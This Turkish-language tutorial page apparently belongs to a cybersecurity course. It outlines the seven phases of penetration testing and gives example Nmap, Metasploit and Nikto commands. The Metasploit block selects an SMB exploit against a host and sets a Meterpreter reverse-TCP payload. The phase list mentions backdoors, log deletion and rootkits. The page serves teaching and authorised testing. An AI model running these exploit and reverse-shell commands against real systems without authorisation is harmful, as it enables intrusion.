🔍
Ana Sayfa / Penetration Testing
🎯

8 — Penetration Testing

Sızma testinin 7 aşaması, kullanılan araçlar ve metodolojiler. Etik hacking sürecinin tüm detayları.

📋 Pentest Aşamaları

1

Keşif (Reconnaissance)

Hedef hakkında bilgi toplama. Pasif keşif (OSINT, WHOIS, DNS) ve aktif keşif (port tarama, servis keşfi) olmak üzere iki türdür. Google dorking, Shodan, Maltego gibi araçlar kullanılır.

2

Tarama (Scanning)

Hedef sistemin yapısını anlamak için aktif tarama. Port tarama (Nmap), güvenlik açığı tarama (Nessus, OpenVAS), web tarama (Nikto, dirb) yapılır.

3

Erişim Kazanma (Gaining Access)

Bulunan zafiyetlerin istismar edilmesi. Exploit çalıştırma, şifre kırma, sosyal mühendislik gibi yöntemler uygulanır. Metasploit Framework ana araçtır.

4

Erişimi Sürdürme (Maintaining Access)

Sisteme kalıcı erişim sağlama. Backdoor yerleştirme, privilege escalation, persistence mekanizmaları kurma.

5

İz Temizleme (Covering Tracks)

Gerçek saldırganların izlerini nasıl temizlediğini anlamak. Log silme, timestamp değiştirme, rootkit kullanımı. Pentest'te bu adım simüle edilir.

6

Analiz (Analysis)

Bulunan tüm güvenlik açıklarının değerlendirilmesi. Risk derecelendirmesi (CVSS), etki analizi ve sınıflandırma yapılır.

7

Raporlama (Reporting)

Kapsamlı pentest raporu hazırlama. Executive summary, teknik detaylar, proof of concept, risk derecelendirmesi ve çözüm önerileri içerir.

🛠️ Temel Pentest Araçları

🔍 Nmap

Network Mapper — port tarama ve servis keşif aracı. Her pentest'in ilk adımıdır.

Nmap Komutları
nmap -sV 192.168.1.1       # Servis versiyon tespiti
nmap -sS -p- target        # SYN scan, tüm portlar
nmap -A target             # Agresif tarama
nmap --script vuln target  # Zafiyet tarama
nmap -sn 192.168.1.0/24    # Ağda canlı hostlar

💀 Metasploit Framework

En kapsamlı exploitation framework'ü. Exploit geliştirme, payload oluşturma ve post-exploitation için kullanılır.

Metasploit Kullanımı
msfconsole                     # Başlatma
search type:exploit smb        # Exploit arama
use exploit/windows/smb/ms17   # Exploit seçme
set RHOSTS 192.168.1.10        # Hedef ayarlama
set PAYLOAD windows/meterpreter/reverse_tcp
exploit                        # Çalıştırma

🕸️ Burp Suite

Web uygulama güvenlik test aracı. HTTP trafiğini yakalama, değiştirme ve tekrar gönderme imkanı sağlar.

ProxyScannerIntruderRepeater

🔎 Nikto

Web sunucu güvenlik tarayıcısı. Bilinen güvenlik açıkları, yanlış yapılandırmalar ve tehlikeli dosyaları tespit eder.

Nikto
nikto -h http://target.com     # Temel tarama
nikto -h target -ssl           # SSL ile tarama
nikto -h target -o report.html # HTML rapor

📝 Notlar 0